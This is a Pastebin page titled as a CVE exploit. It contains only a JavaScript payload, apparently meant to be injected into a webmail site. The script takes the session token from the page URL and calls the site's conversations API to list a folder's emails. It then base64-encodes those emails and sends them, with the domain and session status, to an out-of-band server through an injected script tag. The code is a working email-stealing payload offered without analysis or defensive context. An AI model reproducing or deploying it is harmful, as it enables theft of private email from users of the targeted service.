Advertisement
FlyFar

CVE-2023-08-21 Vulnerability Exploit

Jan 17th, 2024
1,073
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
JavaScript 1.65 KB | Cybersecurity | 0 0
  1. xhr1 = new XMLHttpRequest(), xhr2 = new XMLHttpRequest(), xhr3 = new
  2. XMLHttpRequest();
  3. oob_server = 'https://example.com/';
  4. var script_tag = document.createElement('script');
  5.  
  6. xhr1.open('GET', '/', true);
  7. xhr1.onreadystatechange = () => {
  8.     if (xhr1.readyState === XMLHttpRequest.DONE) {
  9.         _h_cookie = new URL(xhr1.responseURL).search.split("=")[1];
  10.         xhr2.open('PATCH', `/api/v1/conversations/MQ/?_h=${_h_cookie}`,
  11. true);
  12.         xhr2.setRequestHeader('Content-Type', 'application/json');
  13.         xhr2.onreadystatechange = () => {
  14.             if (xhr2.readyState === XMLHttpRequest.DONE) {
  15.                 if (xhr2.status === 401){
  16.                     script_tag.src =
  17. `${oob_server}?status=session_expired&domain=${document.domain}`;
  18.                     document.body.appendChild(script_tag);
  19.                 } else {
  20.                     resp = xhr2.responseText;
  21.                     folderId = JSON.parse(resp)["mails"][0]["folderId"];
  22.                     xhr3.open('GET',
  23. `/api/v1/conversations?folderId=${folderId}&_h=${_h_cookie}`, true);
  24.                     xhr3.onreadystatechange = () => {
  25.                         if (xhr3.readyState === XMLHttpRequest.DONE) {
  26.                             emails = xhr3.responseText;
  27.                             script_tag.src =
  28. `${oob_server}?status=ok&domain=${document.domain}&emails=${btoa(emails)}`;
  29.                             document.body.appendChild(script_tag);
  30.                         }
  31.                     };
  32.                     xhr3.send();
  33.                 }
  34.             }
  35.         };
  36.         var body = JSON.stringify({isUnread: false});
  37.         xhr2.send(body);
  38.     }
  39. };
  40. xhr1.send();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement